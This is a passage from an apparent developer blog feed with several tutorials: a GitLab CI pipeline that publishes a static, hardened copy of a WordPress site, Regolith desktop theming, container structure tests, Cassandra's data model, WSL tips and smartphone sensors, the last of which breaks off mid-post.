        - mv wp_2789218 static
    artifacts:
        paths:
            - static/*
        expire_in: 1 month
    only:
        - master

deploy:
    image:
        name: eeacms/rsync@sha256:de654d093f9dc62a7b15dcff6d19181ae37b4093d9bb6dd21545f6de6c905adb
        entrypoint: [""]
    stage: deploy
    script:
        - rsync -avh --delete --checksum static/ "${RSYNC_REMOTE}"
    dependencies:
        - crawl
    only:
        - master

That’s pretty much it, now you have a pipeline that will generate a static copy of your WordPress site and upload that back to your web space. You could set up a schedule for your pipeline to run automatically on a regular basis or you can use the Run Pipeline button to start the process manually.

We would like to add one more step to our pipeline. It’s always good to do a little bit of testing. Especially if your executing stuff manually without supervision. If the crawler fails for whatever reason to download your complete website, you probably want the pipeline to fail before going into the deploy phase and breaking your website for visitors. So lets perform some basic sanity checks on the static copy before starting the deploy phase. The following checks are all very basic and it’s probably a good idea to add some more checks that are more specific to your installation. Just check for the existence of some sub pages, images, etc. and grep some strings. Also probably you want to make the existing rules a bit stricter.

stages:
    - crawl    - verify_crawl
    - deploy

[...]

verify_crawl:
    image: alpine:3.11.3
    stage: verify_crawl
    script:
        - echo "[INFO] Check that dump is at least 1 mb in size"
        - test "$(du -c -m static/ | tail -1 | cut -f1)" -gt 1

        - echo "[INFO] Check that dump is less than 500 mb in size"
        - test "$(du -c -m static/ | tail -1 | cut -f1)" -lt 500

        - echo "[INFO] Check that there are at least 50 files"
        - test "$(find static/ | wc -l)" -gt 50

        - echo "[INFO] Check that there is a index.html"
        - test -f static/index.html

        - echo "[INFO] Look for 'wordpress' in index.html"
        - grep -q 'wordpress' static/index.html
    dependencies:
        - crawl
    only:
        - master

[...]

Adding a contact form

Even the most basic web sites usually need a little bit of dynamic functionality, in our case we needed a contact form. We decided to go with Ninja Forms Contact Form. Ninja forms work by sending requests to wp-admin/admin-ajax-vhio8powlv.php. This will obviously fail on our static website. To make it work, we will need to reroute requests to admin.ajax.php to our WordPress backend.  The admin-ajax-vhio8powlv.php is used by all sorts of plugins, not only ninja forms and to increase security we want to only whitelist calls for Ninja Forms. Ninja form will make a POST request with application/x-www-form-urlencoded and the parameter action set to nf_ajax_submit. Since there is no way (at least none that we know of) in Apache to filter for form parameters we will need to solve this in PHP. The idea is to create an alternative admin-ajax-vhio8powlv.php to call instead, that in turn will call the wp-admin/admin-ajax-vhio8powlv.php in the WordPress backend, but only for Ninja Form requests. To further increase protection from bots, we will also rename the wp-admin/admin-ajax-vhio8powlv.php to admin-ajax-oAEhFc.php. This won’t really help us against intelligent attackers, but it should stop most bots that try to use an exploit against wp-admin/admin-ajax-vhio8powlv.php.

First we will need to modify the .gitlab-ci.yml  file to add an extra find & sed after wget to the crawl step, to change all urls from wp-admin/admin-ajax-vhio8powlv.php” to “admin-ajax-oAEhFc.php:

[...]
- find wp_2789218/ -type f -exec sed -i -E 's/wp-admin(\\\/|%2F|\/)admin-ajax-vhio8powlv.php/admin-ajax-oAEhFc.php/g' {} \;
[...]

Then we will need to add the admin-ajax-oAEhFc.php to the root of our web space. This file simply checks if this is indeed an Ninja Form call and then include the wp-admin/admin-ajax-vhio8powlv.php from the  WordPress backend. After that we will fix any urls in the output that are still pointing to our WordPress site, so that they point to our static site instead.

<?php 
/* Pass through some functions to the admin-ajax-vhio8powlv.php of the real wp backend. */

// Capture output, so that we can fix urls later.
ob_start();

// Pass through ninja forms
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST) && $_POST['action'] == 'nf_ajax_submit') {
    require (__DIR__ . '/wp_2789218/wp-admin/admin-ajax-vhio8powlv.php');
}

// Everything else should fail.
else {
    echo '0';
}

// Fix urls in output.
$contents = ob_get_contents();
ob_end_clean();


$search_replace = array(
    'wp_2789218/'                => '',
    'wp_2789218\\/'              => '',
    'wp_2789218%2F'              => '',
    'wp_2789218'                 => '',
    'wp-admin/admin-ajax-vhio8powlv.php'    => 'admin-ajax-oAEhFc.php',
    'wp-admin\\/admin-ajax-vhio8powlv.php'  => 'admin-ajax-oAEhFc.php',
    'wp-admin%2Fadmin-ajax-vhio8powlv.php'  => 'admin-ajax-oAEhFc.php',
);

echo str_replace(array_keys($search_replace), array_values($search_replace), $contents);

Finally we will need to modify the .htaccess file to allow requests to admin-ajax-oAEhFc.php and to not rewrite them to static/.

[...]
# Rewrite all request to the static directory.
# Except for requests to the wp installation.
RewriteCond %{REQUEST_URI} !^/static.*
RewriteCond %{REQUEST_URI} !^/admin-ajax-oAEhFc.php$
RewriteCond %{REQUEST_URI} !^/wp_2789218.*
RewriteRule ^(.*)$ static/$1 [L]

And that’s it. If you have done everything correctly after running your pipeline again, Ninja Forms should work.

A similar procedure should work for many other plugins too. Tough keep in mind that with every plugin you allow access to your backend, you will also increase the attack surface.

Adding a custom 404 page

You may want to have a custom 404 page instead of the standard 404 error page that Apache will serve by default. Assuming that you have already created a nice looking 404 page in your WordPress installation, in theory we could just use Wget to make a request to an url that does not exists and use the output of that. Unfortunately Wget does a terrible job dealing with non 200 status codes, there is a –content-on-error option that will let it download the contents of a 404 page, but it will refuse to download any images, stylesheets or other resources attached to it.

To deal with that situation we will simply create a normal page in our WordPress backend and use that as a 404 page. So create your page in WordPress and remember the url you gave it.

We can now add that url to our list of files for Wget to download and then use the .htaccess file to redirect all 404 requests to that file.

Ok so lets add our 404 page to the wget cmd in the .gitlab-ci.yml file:

 

[...]
    - |
            wget \
                -e robots=off \
                --recursive \
                --page-requisites \
                --convert-links \
                --restrict-file-names=windows \
                --http-user="${HTTP_USER}" \
                --http-password="${HTTP_PASSWORD}" \
                --no-host-directories \
                --trust-server-names \
                --adjust-extension \
                --content-on-error \
                "${WORDPRESS_URL}/" \
                "${WORDPRESS_URL}/robots.txt" \
                "${WORDPRESS_URL}/notfound"
[...]

To redirect all 404 errors to notfound/index.html we will have to add one instruction to the .htaccess file:

ErrorDocument 404 /static/notfound/index.html

If you have done everything correctly after you run your pipeline and visit any non exisiting url you should get your custom error page. However if you try to access a deeper level like yourdomain.tld/bogus/bogus/bogus it propabbly looks really fucked up like this:

This is because Wget will rewrite all links to be relative and we access our 404 page from different paths. To fix this we can add a <base> tag inside of the <head> with an absolute url. We insert the base tag with sed after running Wget in the .gitlab-ci.yml like this:

[...]
        - sed -i 's|<head>|<head><base href="/notfound/">|' wp_2789218/notfound/index.html
[...]

And that’s it, if you run your pipeline again the 404 page should look fine:

Conclusion

We have successfully created a Gitlab job that generates and publishes a static copy of a WordPress site and secured the actual WordPress backend against attacks of bots and humans. And because of the 2000 free minutes of CI that Gitlab is currently offering, it didn’t even cost us a dime. If you can live with the limitations of a static website, we’re definitely recommending this or a similar solution to you. It will push the risk of getting hacked near zero and you will no longer need to spend precious time ensuring that your site and all of it’s plugins are up to date. Also your site will be as fast as lightening.

Go ahead and fork: https://gitlab.com/sgellweiler/demo-wordpress-static-copy. And let us know how it works for you in the comment section.

Best regards,

Sebastian Gellweiler

]]>
Regolith Quickstart: Creating a Custom-Theme https://craftcoders.app/regolith-quickstart-creating-a-custom-theme/ Fri, 14 Feb 2020 09:00:21 +0000 https://craftcoders.app/?p=1088 Read More]]> This post is intended for beginners of i3 or more specifically Regolith. Since i3 is just a window-manager and not a fully fletched desktop environment you might have encountered some issues using a pure version of i3.

Regolith is a modern desktop environment that saves you time by reducing the clutter and ceremony that stand between you and your work. Built on top of Ubuntu and GNOME, Regolith stands on a well-supported and consistent foundation. (from Regolith website)

Regolith on the other hand integrates i3 into Ubuntu and Gnome. Even though I didn’t expected it, Regolith really works like a charme. The only thing that can be tricky on first sight is customization and that’s what we’re going to tackle right now!

Preview

Here are two sample images of the system we’re trying to create.

Components

Regolith consists of a couple components to make configuration easier. In the screenshot below you can see where each component comes into play. (and how your system should look like at the end of this tutorial)

regolith-screenshot

The screenshot can give a first impression, but it doesn’t contain all the components that are involved. Rofi for example can be seen in the second preview picture. Let’s dig a little bit deeper to get a better understanding of configuration:

Component Description Influencing style of
i3gaps i3gaps is a fork of i3 with additional functionality. i3 is a dynamic tiling window manager, but you probably know it already if you chose to read this post. i3xrocks
Xresources Xresources is a user-level configuration dotfile, typically located at ~/.Xresources . This is more or less our “root-config” that loads all other component-configs everything
Rofi Rofi, will provide the user with a textual list of options where one or more can be selected. Mostly for running an application, or selecting a window
i3xrocks i3xrocks is a Regolith-fork of i3blocks that uses Xresources. i3blocks generates a status bar with user-defined blocks like a clock
compton Compton is a compositor for X based on Dana Jansens’ version of xcompmgr. Kurzgesagt, it renders your display-output. i3gaps, i3xrocks, Rofi

Creating a Custom-Theme

So now we’re getting to the fun part. All the proposed components have their own system-global configuration files. At the end of the Regolith Customize wiki page, you can see each configurations’ location.

Setting a background image

Let’s start out easy. Since Regolith handles the integration between your Ubuntu settings and the i3-wm you can use the Ubuntu settings to replace your background image. Hit SUPER+C and navigate yourself to the background tab. If you want you can download my wallpaper here.

Staging configuration files

First, we need to stage the Xresources file, which means to copy it to a user-accessible location. Furthermore, we need to create a folder to stage our other configuration files:

$ cp /etc/regolith/styles/root ~/.Xresources-regolith
$ mkdir ~/.config/regolith/

If you take a look at the Xresources config, you can see that all it does is referencing these configurations:

  1. Color theme
  2. System font
  3. GTK Theme
  4. st-term (Regolith default terminal)
  5. i3-wm
  6. i3xrocks
  7. Rofi
  8. Gnome

We’re heading for the files in the “styles” folder. They are only for theming, so don’t confuse them with the config files that change the applications’ behavior like “~/.config/i3/config”. Let’s stage some of these style-configs and apply our new styles:

$ mkdir ~/.config/regolith/styles/
$ cp /etc/regolith/styles/color-nord ~/.config/regolith/styles/custom-coloring
$ cp /etc/regolith/styles/theme-regolith ~/.config/regolith/styles/theme-sweet
$ cp /etc/regolith/styles/i3-wm ~/.config/regolith/styles/i3-wm

A custom coloring scheme

These are the colors that will be used in your desktop environment. Just copy the content into your own file. If you want to define your own colors coolors.co is a good starting point to get inspiration 🙂

--- File: custom-coloring ---

! Custom colors
#define color_base03   #26262d
#define color_base02   #474956
#define color_base01   #4c4d5b
#define color_base00   #c0c3db
#define color_base0    #edf2ff
#define color_base1    #E5E9F0
#define color_base2    #ECEFF4
#define color_base3    #f2f5f9
#define color_yellow   #edcd8e
#define color_orange   #e59572
#define color_red      #e57472
#define color_magenta  #908dc4
#define color_violet   #9d8dc4
#define color_blue     #81A1C1
#define color_cyan     #88C0D0
#define color_green    #A3BE8C

GTK and icon theme

--- File: theme-sweet ---

#define gtk_theme       Sweet-Dark
#define icon_theme      Sweet-Purple

For this to work, you need to copy the Sweet icon-theme and Sweet GTK theme onto your machine. Of course, you are free to choose whatever theme you like. Their names (Sweet-Dark for the theme and Sweet-Purple for the icons) are defined in their config files both named “index.theme”. My setup is available here:

You need to copy them to one of the two possible paths:

Theme: ~/.themes/ or /usr/share/themes/
Icons: ~/.icons/ or /usr/share/icons/ 

i3-wm config

The i3-wm config (for i3gaps) defines which color from our custom-coloring file is used for what. Furthermore, it defines how workspaces are displayed in i3bar and how i3xrocks looks in general. So now is the time to define which workspace should be used for which use-case. In my case I have separate workspaces for

  • Browser
  • Terminals
  • Text Editing (VS-Code)
  • Coding (IDE’s like IntelliJ)
  • Chatting
  • Music

All the other workspaces are used randomly, thus called “Other”.

--- File: i3-wm ---

#define Q(x) #x
#define QUOTE(x) Q(x)

#define glyph typeface_bar_glyph_workspace

i3-wm.bar.font: typeface_bar

i3-wm.bar.background.color: color_base03
i3-wm.bar.statusline.color: color_base00
i3-wm.bar.separator.color: color_yellow
i3-wm.bar.workspace.focused.border.color: color_base02
i3-wm.bar.workspace.focused.background.color: color_base02
i3-wm.bar.workspace.focused.text.color: color_base2
i3-wm.bar.workspace.active.border.color: color_base02
i3-wm.bar.workspace.active.background.color: color_base02
i3-wm.bar.workspace.active.text.color: color_base00
i3-wm.bar.workspace.inactive.border.color: color_base03
i3-wm.bar.workspace.inactive.background.color: color_base03
i3-wm.bar.workspace.inactive.text.color: color_base00
i3-wm.bar.workspace.urgent.border.color: color_red
i3-wm.bar.workspace.urgent.background.color: color_red
i3-wm.bar.workspace.urgent.text.color: color_base3

i3-wm.client.focused.color.border: color_base03
i3-wm.client.focused.color.background: color_base01
i3-wm.client.focused.color.text: color_base3
i3-wm.client.focused.color.indicator: color_blue
i3-wm.client.focused.color.child_border:

i3-wm.client.focused_inactive.color.border: color_base03
i3-wm.client.focused_inactive.color.background: color_base02
i3-wm.client.focused_inactive.color.text: color_base0
i3-wm.client.focused_inactive.color.indicator: color_base02
i3-wm.client.focused_inactive.color.child_border:

i3-wm.client.unfocused.color.border: color_base03
i3-wm.client.unfocused.color.background: color_base02
i3-wm.client.unfocused.color.text: color_base0
i3-wm.client.unfocused.color.indicator: color_base02
i3-wm.client.unfocused.color.child_border:

i3-wm.client.urgent.color.border: color_base03
i3-wm.client.urgent.color.background: color_red
i3-wm.client.urgent.color.text: color_base3
i3-wm.client.urgent.color.indicator: color_red
i3-wm.client.urgent.color.child_border:

#define glyph_font QUOTE(typeface_bar_glyph)
#define WORKSPACE_NAME(INDEX, NAME, FONT) INDEX<span font_desc=FONT> INDEX: NAME </span>

i3-wm.workspace.01.name: WORKSPACE_NAME(1, BR0WSER, glyph_font)
i3-wm.workspace.02.name: WORKSPACE_NAME(2, T3RM, glyph_font)
i3-wm.workspace.03.name: WORKSPACE_NAME(3, ED1T1NG, glyph_font)
i3-wm.workspace.04.name: WORKSPACE_NAME(4, C0D1NG, glyph_font)
i3-wm.workspace.05.name: WORKSPACE_NAME(5, C0D1NG, glyph_font)
i3-wm.workspace.06.name: WORKSPACE_NAME(6, 0TH3R, glyph_font)
i3-wm.workspace.07.name: WORKSPACE_NAME(7, 0TH3R, glyph_font)
i3-wm.workspace.08.name: WORKSPACE_NAME(8, 0TH3R, glyph_font)
i3-wm.workspace.09.name: WORKSPACE_NAME(9, CH4T, glyph_font)
i3-wm.workspace.10.name: WORKSPACE_NAME(10, MUS1C, glyph_font)
i3-wm.workspace.11.name: WORKSPACE_NAME(11, 0TH3R, glyph_font)
i3-wm.workspace.12.name: WORKSPACE_NAME(12, 0TH3R, glyph_font)
i3-wm.workspace.13.name: WORKSPACE_NAME(13, 0TH3R, glyph_font)
i3-wm.workspace.14.name: WORKSPACE_NAME(14, 0TH3R, glyph_font)
i3-wm.workspace.15.name: WORKSPACE_NAME(15, 0TH3R, glyph_font)
i3-wm.workspace.16.name: WORKSPACE_NAME(16, 0TH3R, glyph_font)
i3-wm.workspace.17.name: WORKSPACE_NAME(17, 0TH3R, glyph_font)
i3-wm.workspace.18.name: WORKSPACE_NAME(18, 0TH3R, glyph_font)
i3-wm.workspace.19.name: WORKSPACE_NAME(19, 0TH3R, glyph_font)

Using our new configurations

Now we can finally make use of our new config files. Therefore we need to replace the reference in our .Xresources-regolith file. In the end it should look something like this: (make sure to replace USER with your username)

--- File: .Xresources-regolith ---

! This is the Regolith root-level Xresources file.
!
! -- Styles - Colors
!
! Uncomment one and only one of the following color definitions: 
#include "/home/USER/.config/regolith/styles/custom-coloring"

! -- Styles - Fonts
! NOTE: Font packages may need to be installed when enabling typefaces.
! Uncomment one and only one of the following font definitions:
#include "/etc/regolith/styles/typeface-sourcecodepro"
!#include "/etc/regolith/styles/typeface-ubuntu"

! -- Styles - Theme
! NOTE: GTK theme and icon packages may need to be installed when enabling themes.
! Uncomment one and only one of the following theme definitions:
!
#include "/home/USER/.config/regolith/styles/theme-sweet"

! -- Applications
! These files map values defined above into specific app settings.
#include "/etc/regolith/styles/st-term"
#include "/home/USER/.config/regolith/styles/i3-wm"
#include "/etc/regolith/styles/i3xrocks"
#include "/etc/regolith/styles/rofi"
#include "/etc/regolith/styles/gnome"

As you can see, we also replaced the system font from typeface-ubuntu to typeface-sourcecodepro. Now save, logout and back in, so that your changes can be applied.

Conclusion

That’s it! Now your system should be really similar to the screenshots above 🙂 As you can see customization is pretty straightforward as soon as you got a basic understanding of the used components and their configurations. If you want take a look at staging your own i3- and i3xrocks config files, to use your new desktop environment to the fullest. Alternatively, you can take a look at my dotfiles to get a glimpse of my system. Whatever you do, have fun tweaking your UI!

Greetings, Domi

]]>
Sophisticated Google container structure tests https://craftcoders.app/sophisticated-google-container-structure-tests/ Mon, 20 May 2019 08:00:39 +0000 https://craftcoders.app/?p=1043 Read More]]> Last week we did an innovation week at our company, crowding up together and trying to figure out what can be done to improve our systems. Our group chose to setup a private docker registry and to automate the creation of docker images for our test-system. After some research we came up with Google’s framework named container structure tests, to verify that the automatically created containers are actually working.

The Container Structure Tests provide a powerful framework to validate the structure of a container image. These tests can be used to check the output of commands in an image, as well as verify metadata and contents of the filesystem.

GoogleContainerTools @ Github

The way it is always, you can create very simple test scenarios very fast, but there is few documentation when it comes to more complicated stuff. With this post I want to sum up the pitfalls you might encounter and offer solutions, so you can get the most out of the framework. If you need to know the basic stuff first jump over to the read-me and come back later 😉

Pitfalls and solutions

Image entry-points are removed by default

Every docker container comes with an entry-point defining what it should do on startup. These can influence the structure of the container or consume a lot of time, so they are removed by default. In our case we needed the entry-point, since we wanted to test whether our PostgreSQL container is working properly. What you should do (according to the docs) is using the setup section of the test like so:

commandTests:
  - name: "postgres starts without errors"
    setup:
      - ["./docker-entrypoint.sh", "postgres"]
    command: "psql"
    args: ["-d", "db-name", "-U", "db-user", "-c", "\q"]

This small test should start a new container, run the entrypoint script for postgres and finally check that we can connect to a database without any error. The exit code is expected to be zero by default. Sadly, this is not how it actually works as you will see in the next section.

Every command runs in a separate container instance

The setup section and the teardown section as well, are a list of commands, whereas the command section is just a single command. All of these commands run in their own separate container and then commit a modified image to be the new base image for the next command in the list. Since in our postgres example the entrypoint is starting a database in a setup command, this database will be running in this command’s container only. This leads to the need of multiple commands in the same container, which we can’t accomplish using the setup section.

Multi-line commands

We can trick the framework to run multiple commands in the same container using bash -c <list of commands>. Since this can get convoluted pretty fast, we can make use of YAML’s “literal style” option (the | sign) to preserve newlines.

  - name: "postgres starts without errors"
    command: "bash"
    args:
      - -c
      - |
          bash -c './docker-entrypoint.sh postgres &' &&
          sleep 10 &&
          psql -d "db-name" -U "db-user" -c '\q'

This is the final (and actually working) version of the same test. As you can see, we are now running the docker-entrypoint script in the same container like the psql command. But since the script is starting a database instance we had to wrap it up in a second bash -c command so we could detach it from the console output with the ampersand (&) at the end. Furthermore we had to add some sleep time to give the database a chance to come up before we check if it is working.

Switching user profiles

Sometimes it might be necessary to run a command as a different user than root. As user postgres for example 😀 Fortunately, this can be accomplished similar to bash -c using su -c like that:

  - name: "run a command as a different user"
    command: "su"
    args:
      - postgres
      - -c
      - whoami
    expectedOutput: ["postgres"]

Alrighty, that’s all I wanted to share for now. I hope the post will spare some time of yours. Please keep in mind that Google’s framework container structure tests has been made to verify the structure and general setup of your container. It is not meant to be used for something like integration tests. Thank’s for reading and have a nice day 🙂

Greets, Domi

]]>
A deep dive into Apache Cassandra – Part 1: Data Structure (was not continued) https://craftcoders.app/a-deep-dive-into-apache-cassandra-part-1-data-structure/ Mon, 01 Oct 2018 19:14:56 +0000 https://craftcoders.app/?p=749 Read More]]> Hey guys,

during my studies I had to analyze the NoSQL database Cassandra as a possible replacement for a regular relational database.
During my research I dove really deep into the architecture and the data model of Cassandra and I figured that someone may profit from my previous research, maybe for your own evaluation process of Cassandra or just personal curiosity.


I will separate this huge topic into several posts and make a little series out of it. I don’t know how many parts the series will contain yet, but I will try to keep every post as cohesive and understandable as possible.

Please forgive me, as I have to introduce at least a couple of terms or concepts I won’t be able to describe thoroughly in this post. But don’t worry, I will be covering them in an upcoming one.

What is Cassandra?

Cassandra is a column-oriented open source NoSQL database whose data model is based on Big Table by Google and its distributed architecture on Dynamo by Amazon. It was originally developed by Facebook, later Cassandra became an Apache project and is now one of the top-level projects at Apache. Cassandra is based on the idea of a decentralized, distributed system without a single point of failure and is designed for high data throughput and high availability.

Cassandras Data Structure

I decided to begin my series with Cassandras data structure because it is a good introduction to the general ideas behind Cassandra and a good foundation for future posts regarding the Cassandra Query Language and the distributed nature of it.

I try to give you an overview how data is stored in Cassandra and show you some similarities and differences to a relational database, so let’s get right to it.

Columns, Rows and Tables

The basic component in Cassandras data structure is the column, which consists classically of a key/value pair. Individual columns are combined in a row and uniquely identified by a primary key. It consists of one or more columns and the primary key, which can also consist of one or more columns. To connect individual rows describing the same entity in a logical unit, Cassandra defines tables, which are a container for similar data in row format, equivalent to relations in relational databases.

the row data structure in Cassandra

However, there is a remarkable difference to the tables in relational databases. If individual columns of a row are not used when writing to the database, Cassandra does not replace the value with zero, but the entire column is not stored. This represents a storage space optimization, so the data model of tables has similarities to a multidimensional array or a nested map.

table consisting of skinny rows

Skinny and Wide Rows

Another special feature of the tables in Cassandra is the distinction between skinny and wide rows. I only described skinny rows so far, i.e. they do not have a complex primary key with clustering columns and few entries in the individual partitions, in most cases only one entry per partition.

You can imagine a partition as an isolated storage unit within Cassandra. There are typically several hundred of said partitions in a Cassandra installation. During a write or read operation the value of the primary key gets hashed. The resulting value of the hash algorithm can be assigned to a specific partition inside the Cassandra installation, as every partition is responsible for a certain range of hash values. I will dedicate a whole blog post to the underlying storage engine of Cassandra, so this little explanation has to suffice for now.

Wide rows typically have a significant number of entries per partition. These wide rows are identified by a composite key, consisting of a partition key and optional clustering keys.

table consisting of wide rows


When using wide rows you have to pay attention to the defined limit of two billion entries in a partition, which can happen quite fast when storing measured values of a sensor, because after reaching the limit no more values can be stored in this partition.


The partition key can consist of one or more columns, just like the primary key. Therefore, in order to stay with the example of the sensor data, it makes sense to select the partition key according to several criteria. Instead of simply partitioning according to for example a sensor_id, which depending on the number of incoming measurement data would sooner or later inevitably exceed the limit of 2 billion entries per partition, you can combine the partition key with the date of the measurement. If you combine the sensor_id with the date of the measurement the data is written to another partition on a daily basis. Of course you can make this coarser or grainer as you wish (hourly, daily, weekly, monthly).

The clustering columns are needed to sort data within a partition. Primary keys are also partition keys without additional clustering columns.

Several tables are collected in to a keypsace, which is the exact equivalent of a database in relational databases.

Summary

The basic data structures are summarized,

  • the column, consisting of key/value pairs,
  • the row, which is a container for contiguous columns, identified by a primary key,
  • the table, which is a container for rows and
  • the keyspace, which is a container for tables.

I hope I was able to give you a rough overview of the data structure Cassandra uses. The next post in this series will be about the Cassandra Query Language (CQL), in which I will give you some more concrete examples how the data structure affects the data manipulation.

Cheers,

Leon

]]>
5 Things I love about WSL https://craftcoders.app/5-things-i-love-about-wsl/ Mon, 17 Sep 2018 08:00:48 +0000 https://craftcoders.app/?p=683 Read More]]> I got a new PC and love it! But a new PC also means a whole new setup and a lot of work. One of the first things I’ve setup has been the Windows Subsystem for Linux. I know I am a developer and most of you would not expect me to work on a windows machine. Guys I must tell you windows is fucking awesome and with WSL it’s just getting more awesome! Here five things I really love about WSL

1. Interoperability

Starting with Windows build 14951 Microsoft added the possibility to (1) invoke Linux binaries from the Windows Console (2) invoke Windows binaries from the Linux Console and (3) sharing environment variables between Windows and Linux. Furthermore, with the Fall creates Update Microsoft include the windows path in the Linux $Path so it is easy to call windows binaries from Linux. So, to call Windows binaries from windows you just must type:

[binaries name].exe

For instance, you could open the windows file explorer at the current location of your windows console by simply calling:

 explorer.exe .
launching explorer from the Linux Console

2. Docker

Okay now I gonna cheat but its so cool it deserves to be its own point. Due to the Interoperability between WSL and Windows you do not need to expose some creepy port or build complicated relay between WSL and Windows. You can just run “docker.exe” to use docker for windows inside your Linux console. Ok I admit this is not very practical since you have always to type “.exe”. But Linux is awesome and lets you define aliases so such things. All you need to do is:

  1. Open ~/.bashrc
  2. Go to the end of the file
  3. Add following lines (at the end)
    alias docker=docker.exe
    alias docker-compose=docker-compose.exe
Docker

3. WSLGIT

As mentioned in (1) you can execute windows binaries from the Linux console. As a result, you can open VSCode from the Linux Console. Here´s the catch: VSCode would still use Git for Windows. This is not really a problem and works. I really love to use git inside my Linux console, but I don’t want to manage two git installations on the same machine. One could argue that you could do the same trick as we did with docker and that’s true but this time we do is the other way round. There is a GitHub Project from andy-5 that is called WSLGIT. Basically, this project aims to provide a small executable that forwards arguments to git running inside Bash on Windows. All that needs to be done is:

  1. Download the executable
  2. Save the .exe somewhere
  3. Change the settings of your IDEs to use wslgit.exe as git executable

4. X-Server for Windows

So, what can’t be done with WSL? Right you can not run graphical applications. Can`t you? That’s just partial true: You can use an implementation of X-Server for windows and forward it inside your bash. I use the Xming X Server. Simply download it and install it. After installation open XLaunch, select “Multiple Windows” and “Display Number 0” at the first screen. Select “Start no client” at the second screen. Select “Clipboard” and go forward. Now you can save this configuration and add it to your autostart folder. That why you never have to configure it again (even when we just used the default configuration ?). Inside your Linux console you just must run

export DISPLAY=:0

and you are ready to go. Now you can start graphical applications!

Fixing HDPI

You may encounter the same problem as I did. My new PC got a UHD resolution and graphical applications running with Xming X Server are blurry. This is the fault of the windows compatibility mode that is scaling the application. To fix it you need:

1. Navigate to the installation folder of Xming 
2. Open the Properties of Xming.exe
3. Click on compatibility
4. Click on HDPI-Settings
5. Override HDPI-Setting with application defaults

DPI-Settings



So, every Linux application is really small ?. But don’t mind we can fix that inside Linux! If we use GTK application, we can just increase the GTK scaling factor by typing:

export GDK_SCALE=3

The power of X-Server

5. Seamlessly using Linux

This sums it up, but I will show you what I mean by example. We gonna run Tilix, a tiling terminal emulator for Linux using GTK+ 3, as it would be a ordinary windows application. Note to do that, you need to follow the instructions under point (4). I’m assuming you already did that. To install Tilix we just need to type

sudo add-apt-repository ppa:webupd8team/terminix
sudo apt-get update
sudo apt-get install tilix

You might encounter some problems regarding the dbus service. For instance you could get a error message like this:

failed to commit changes to dconf: Failed to execute child process “dbus-launch” (No such file or directory)

 

Dont you worry child! It is easy to fix. We just need to install the dbus-service and run execute it:

sudo apt-get install dbus-x11
sudo service dbus start

That’s all! The make it more convenient to use we are going to write a small script to launch it. Just open VSCode and copy and paste following:

args = "-c" & " -l " & """GDK_SCALE=3 DISPLAY=:0 tilix"""

WScript.CreateObject("Shell.Application").ShellExecute "bash", args, "", "open", 0

NOTE: if you don’t have UDH resolution you can remove following GDK_SCALE=3. Save the script under …Programms/Tilix and name it tilix.vbs. Now we need a second script a simple bat file that we use to invoke our first script:

WScript tilix.vbs

Almost done! We can now send the bat script to the deskop and get a nice clickable icon that can be used to launch Tilix. If you put it in the Startmenu folder you can even use it from the Startmenu in windows 10!

running tilix
]]>
Smartphone Sensors for Dummies https://craftcoders.app/smartphone-sensors-for-dummies/ Sun, 09 Sep 2018 17:13:29 +0000 https://craftcoders.app/?p=616 Read More]]> On my way exploring Augmented Reality under iOS, I have come across Core Motion Framework, which provides tools for working with motion- and environment-related data your device captures. There are numerous applications for this kind of information, especially if we are talking about location-based services or any apps which need to be sensitive to their environment. Since, as a mobile developer, you do not necessarily possess a degree in Physics, and math skills have gathered a thick layer of dust by now, let’s try to make complicated things more approachable. In today’s blog, we are going to talk about the built-in motion sensors and the way you can use them for the good of humanity. Or to build a silly useless app based on a cheesy cartoon, let’s see which one it will be.

All kinds of -meters and a -scope.

In this section, we are going to be looking into 5 different kinds of sensors, built into your device and reading motion information while you’re not watching. For one, it’s good to know all the opportunities you have regarding tracking environment-related events, and, secondly, what an excellent ice-breaker for the next social event you’re attending! So let’s dive right in.

Accelerometer

This guy is not a slyish type of sensor, hiding its purpose behind some fancy mixture of greek and latin. It is a simple kind of guy, clear about its intentions: just minding its own business, measuring your acceleration here and there. If you know what acceleration is, you basically understood what this sensor is all about. If you don’t, that is weird, and I don’t think I can help you, so just stop reading and go rethink your life choices.

No, I’m kidding, I can totally help you. Just give me a call, we can talk this out. For the rest of you, we are just going to make one step further towards the understanding of how this sensor works. For this, imagine yourself on a freefall tower ride in an amusement park. The seatbelts are fastened, and you are going up. Since our tower is pretty tall, and the guy in control is really looking forward to his lunch break, you are going up pretty fast, so that you start feeling your body pressing harder on the seat beneath you. Seconds later, you are at the top and getting ready to experience the free fall. Our hungry amusement park employee presses the big red button on the panel in front of him, and you start falling all the way down, floating just a little above your seat. This time, you feel the shoulder harness pressing into your skin, holding you back from lifting up too much. This is what an accelerometer experiences all the time. Well, maybe it’s not that exciting, we’ll never know. But the principle used in the sensor is the same. A body, loosely attached to a moving plate, is going to experience forces, pushing it in the direction, opposite to the movement. By measuring the extent, to which these forces cause the body to move, our sensor is able to tell us, what the acceleration of the plate is. If you are interested in how it looks in real life, you can check this link or this one.

Pedometer

Next up is the pedometer, the favorite sensor of all the fitness-junkies. This is the guy who counts the number of steps between your bed and your fridge (because little achievements matter) and celebrates how sporty you are when you take 10.000 steps inside a shopping mall. How does he do that? The answer is a deep understanding of how walking works. Each step we take consists of several phases, in which we tilt and accelerate in different directions and to a different extent. Distinguishing between sets of movements that constitute a single step allows this sensor to count their total amount. Earlier in the days, separate mechanical sensors have been used to recognize the step pattern. Pedometers inside modern devices usually rely heavily on input data provided by other inertial sensors. They do not measure the motion themselves, and only make sense of the given measurements. This makes our pedometer a software wannabe among real hardcore hardware sensors we are discussing here. But it allowed you to stare at your monitor for the rest of the day since you’ve reached your walking goal, so be kind to it.

Magnetometer

I think we can all imagine, what this one is trying to measure. What is more interesting, is how it goes about the task. To answer this question, we would usually have to talk about electrons, conductors, circuits and voltage and all that jazz. But since I promised to make things simple, let’s take an example of something that is more fun. Like tourists. Tourists are exceptional beings, who manage to get fascinated by a large number of things in a highly limited time. So imagine a place of interest, with an entrance, an exit and a path in between. Let’s say it’s a sea life museum, with all kinds of fish swimming around our tourists in fish tanks, which build an arch around the path. Our tourists would form a large group at the entrance and, the moment the museum opens its doors, a flow of fascinated humans is going to flood all the way up to the exit. They would keep walking, building what looks like a steadily moving queue through the whole museum. This is how electrons are usually portrayed in a circuit, moving along from where there is a whole bunch of them to where there is none.

